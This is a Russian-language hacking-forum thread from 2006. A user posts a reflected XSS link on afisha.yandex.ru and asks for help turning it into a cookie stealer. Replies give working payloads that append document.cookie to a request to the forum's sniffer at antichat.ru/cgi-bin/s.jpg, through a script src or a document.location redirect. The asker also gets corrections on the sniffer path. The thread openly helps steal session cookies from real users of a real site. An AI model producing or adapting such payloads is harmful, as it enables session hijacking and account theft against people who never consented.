Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Xss на яндексе... Требуеца помощь |
18.12.2006, 02:35
|
|
Познающий
Регистрация: 13.12.2006
Сообщений: 77
Провел на форуме:
624475
Репутация:
70
|
|
Xss на яндексе... Требуеца помощь
PHP код:
http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3Cscript%3Ealert()%3C/script%3E
Вот наша хсска... Нам нада составить ее так чтобы логи шли на сниффер... Народ, кому не лень составьте пожалуйста четкую ссылку на сниффер античата... Долблюсь ап стену уже 3 час и нифига не пойму где у меня ошибка.... Если распишите все поэтапно буду очень благодарен... В любом случае с меня + к репе!
Извиняюсь за тупые вопросы в ХSS еще плохо разбираюсь поэтому йад и стены прошу не прописывать  |
|
|
18.12.2006, 02:39
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136
Репутация:
4536
|
|
http://forum.antichat.ru/thread19610.html
|
|
|
|
18.12.2006, 03:42
|
|
Познающий
Регистрация: 13.12.2006
Сообщений: 77
Провел на форуме:
624475
Репутация:
70
|
|
Просмотрел почти все темы... В принципе уяснил что к чему, но опять же в теории все слишком аморфно.. На рпактике все гораздо сложнее... Всеже попрошу составить скрипт по крайней мере для наглядности...
|
|
|
|
18.12.2006, 04:34
|
|
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508
Репутация:
1745
|
|
Просмотрел почти все темы... В принципе уяснил что к чему, но опять же в теории все слишком аморфно.. На рпактике все гораздо сложнее... Всеже попрошу составить скрипт по крайней мере для наглядности...
ЗА чем тебе писать или искать скрипт, просто на форуме есть тема где их выкладывают!
|
|
|
|
18.12.2006, 04:50
|
|
Познающий
Регистрация: 13.12.2006
Сообщений: 77
Провел на форуме:
624475
Репутация:
70
|
|
да я имею ввиду применение скрипта. ну допустим мне нада составить его так чтобы он таскал куки на мой снифер на античате. приведите мне пример на этой xss.
|
|
|
|
18.12.2006, 05:07
|
|
Познающий
Регистрация: 13.12.2006
Сообщений: 77
Провел на форуме:
624475
Репутация:
70
|
|
вобщем даже вот в чем суть вопроса- помогите составить корректный запрос чтобы с этого адреса куки уходили на сниффер...
|
|
|
|
18.12.2006, 07:21
|
|
Познающий
Регистрация: 17.12.2006
Сообщений: 32
Провел на форуме:
172639
Репутация:
31
|
|
Сообщение от IDentety
PHP код:
http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3Cscript%3Ealert()%3C/script%3E
Вот наша хсска... Нам нада составить ее так чтобы логи шли на сниффер... Народ, кому не лень составьте пожалуйста четкую ссылку на сниффер античата... Долблюсь ап стену уже 3 час и нифига не пойму где у меня ошибка.... Если распишите все поэтапно буду очень благодарен... В любом случае с меня + к репе!
Извиняюсь за тупые вопросы в ХSS еще плохо разбираюсь поэтому йад и стены прошу не прописывать На, лови:
Код:
http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3Cscript src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;></script%3E
Плюс не забудь 
|
|
|
|
18.12.2006, 10:10
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
Можешь соорудить что нибудь этакое
<script>document.location="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie</script>
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
Последний раз редактировалось Constantine; 18.12.2006 в 10:21..
|
|
|
|
18.12.2006, 10:33
|
|
Познающий
Регистрация: 13.12.2006
Сообщений: 77
Провел на форуме:
624475
Репутация:
70
|
|
вот соорудил я конструкцию такого вида
http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3Cscript %20src=%22http://antichat.ru/s/мойсниф.jpg?%22+document.cookie;%3E%3C/script%3E
но отчеты не приходят.. видно гдето абшибся
|
|
|
|
18.12.2006, 10:40
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
Тык неправельно ты адрес задал, надо не ../s/yoursniff.jpg а .../cgi-bin/yoursnif.jpg
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
